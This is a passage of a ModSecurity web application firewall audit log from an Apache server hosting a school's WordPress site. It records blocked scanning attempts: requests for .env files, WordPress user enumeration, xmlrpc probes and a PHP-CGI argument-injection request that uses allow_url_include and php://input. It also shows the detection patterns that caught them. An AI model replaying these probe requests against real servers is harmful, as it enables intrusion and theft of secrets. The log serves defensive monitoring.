x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7fe3f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7fe3f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714963738365 2960 (- - -) Stopwatch2: 1746714963738365 2960; combined=1287, p1=441, p2=816, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7fe3f3b-Z-- --5d36fe47-A-- [08/May/2025:21:36:07 +0700] aBzBV44K347NtBcwXKxhLQAAAJM 103.236.140.4 50728 103.236.140.4 8181 --5d36fe47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d36fe47-C-- demo.sayHello --5d36fe47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d36fe47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714967159185 4997 (- - -) Stopwatch2: 1746714967159185 4997; combined=3797, p1=555, p2=3031, p3=26, p4=26, p5=92, sr=142, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d36fe47-Z-- --479a1d55-A-- [08/May/2025:21:37:27 +0700] aBzBpys5rYyn3jlLjjIWcwAAAMc 103.236.140.4 50736 103.236.140.4 8181 --479a1d55-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --479a1d55-C-- --479a1d55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479a1d55-E-- --479a1d55-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746715047729257 4785 (- - -) Stopwatch2: 1746715047729257 4785; combined=3197, p1=484, p2=2679, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479a1d55-Z-- --d1f0406f-A-- [08/May/2025:22:02:04 +0700] aBzHbCs5rYyn3jlLjjIWggAAANc 103.236.140.4 50836 103.236.140.4 8181 --d1f0406f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1f0406f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f0406f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746716524851760 3027 (- - -) Stopwatch2: 1746716524851760 3027; combined=1296, p1=446, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1f0406f-Z-- --8416d534-A-- [08/May/2025:22:02:09 +0700] aBzHcSs5rYyn3jlLjjIWhAAAAMM 103.236.140.4 50842 103.236.140.4 8181 --8416d534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8416d534-C-- demo.sayHello --8416d534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8416d534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746716529330702 4522 (- - -) Stopwatch2: 1746716529330702 4522; combined=3527, p1=431, p2=2900, p3=22, p4=24, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8416d534-Z-- --74e9677f-A-- [08/May/2025:22:08:55 +0700] aBzJBys5rYyn3jlLjjIWhwAAAMs 103.236.140.4 50884 103.236.140.4 8181 --74e9677f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 58.187.141.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 58.187.141.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --74e9677f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e9677f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746716935366816 2517 (- - -) Stopwatch2: 1746716935366816 2517; combined=1228, p1=403, p2=794, p3=0, p4=0, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e9677f-Z-- --c906054a-A-- [08/May/2025:22:13:39 +0700] aBzKI6cs1DvJ_HgMHE9hUAAAABg 103.236.140.4 50928 103.236.140.4 8181 --c906054a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c906054a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c906054a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746717219412070 805 (- - -) Stopwatch2: 1746717219412070 805; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c906054a-Z-- --3160881e-A-- [08/May/2025:22:33:05 +0700] aBzOscP9GxxPAbCroFYucgAAAEc 103.236.140.4 55630 103.236.140.4 8181 --3160881e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3160881e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3160881e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746718385561676 1171 (- - -) Stopwatch2: 1746718385561676 1171; combined=383, p1=338, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3160881e-Z-- --62466f78-A-- [08/May/2025:22:39:25 +0700] aBzQLacs1DvJ_HgMHE9j0QAAAAA 103.236.140.4 60570 103.236.140.4 8181 --62466f78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.146.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.146.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62466f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62466f78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746718765316010 2697 (- - -) Stopwatch2: 1746718765316010 2697; combined=1422, p1=519, p2=865, p3=0, p4=0, p5=38, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62466f78-Z-- --3cee434f-A-- [08/May/2025:22:44:17 +0700] aBzRUcP9GxxPAbCroFYwrAAAAEU 103.236.140.4 36110 103.236.140.4 8181 --3cee434f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.152.107.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.152.107.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cee434f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cee434f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746719057098587 4037 (- - -) Stopwatch2: 1746719057098587 4037; combined=2068, p1=611, p2=1418, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cee434f-Z-- --6bed3440-A-- [08/May/2025:22:45:38 +0700] aBzRoqcs1DvJ_HgMHE9lDQAAABI 103.236.140.4 37164 103.236.140.4 8181 --6bed3440-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 Accept-Charset: utf-8 --6bed3440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bed3440-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746719138405129 812 (- - -) Stopwatch2: 1746719138405129 812; combined=350, p1=303, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bed3440-Z-- --362b6a30-A-- [08/May/2025:23:29:07 +0700] aBzb06cs1DvJ_HgMHE9umgAAAAU 103.236.140.4 41312 103.236.140.4 8181 --362b6a30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --362b6a30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --362b6a30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746721747952670 3135 (- - -) Stopwatch2: 1746721747952670 3135; combined=1407, p1=441, p2=931, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --362b6a30-Z-- --135c4929-A-- [08/May/2025:23:29:10 +0700] aBzb1qcs1DvJ_HgMHE9unwAAAAg 103.236.140.4 41348 103.236.140.4 8181 --135c4929-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --135c4929-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --135c4929-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746721750262184 2610 (- - -) Stopwatch2: 1746721750262184 2610; combined=1336, p1=440, p2=862, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --135c4929-Z-- --d4bf0f27-A-- [08/May/2025:23:29:12 +0700] aBzb2Kcs1DvJ_HgMHE9upwAAABI 103.236.140.4 41380 103.236.140.4 8181 --d4bf0f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4bf0f27-C-- demo.sayHello --d4bf0f27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4bf0f27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746721752563615 6338 (- - -) Stopwatch2: 1746721752563615 6338; combined=4742, p1=649, p2=3851, p3=36, p4=37, p5=99, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4bf0f27-Z-- --3cda5423-A-- [08/May/2025:23:29:16 +0700] aBzb3Kcs1DvJ_HgMHE9usgAAAAA 103.236.140.4 41432 103.236.140.4 8181 --3cda5423-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.107.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.107.241 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3cda5423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cda5423-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746721756432772 779 (- - -) Stopwatch2: 1746721756432772 779; combined=326, p1=285, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cda5423-Z-- --3d094609-A-- [08/May/2025:23:29:26 +0700] aBzb5sP9GxxPAbCroFY5EAAAAFE 103.236.140.4 41558 103.236.140.4 8181 --3d094609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d094609-C-- demo.sayHello --3d094609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d094609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746721766057872 6775 (- - -) Stopwatch2: 1746721766057872 6775; combined=5013, p1=724, p2=4058, p3=43, p4=65, p5=74, sr=67, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d094609-Z-- --de0d3e30-A-- [08/May/2025:23:34:32 +0700] aBzdGMP9GxxPAbCroFY57AAAAFg 103.236.140.4 45474 103.236.140.4 8181 --de0d3e30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --de0d3e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de0d3e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746722072340730 800 (- - -) Stopwatch2: 1746722072340730 800; combined=321, p1=270, p2=0, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de0d3e30-Z-- --6055a52a-A-- [08/May/2025:23:38:24 +0700] aBzeAMP9GxxPAbCroFY6hwAAAFA 103.236.140.4 48296 103.236.140.4 8181 --6055a52a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36 Accept-Charset: utf-8 --6055a52a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6055a52a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746722304991615 775 (- - -) Stopwatch2: 1746722304991615 775; combined=309, p1=271, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 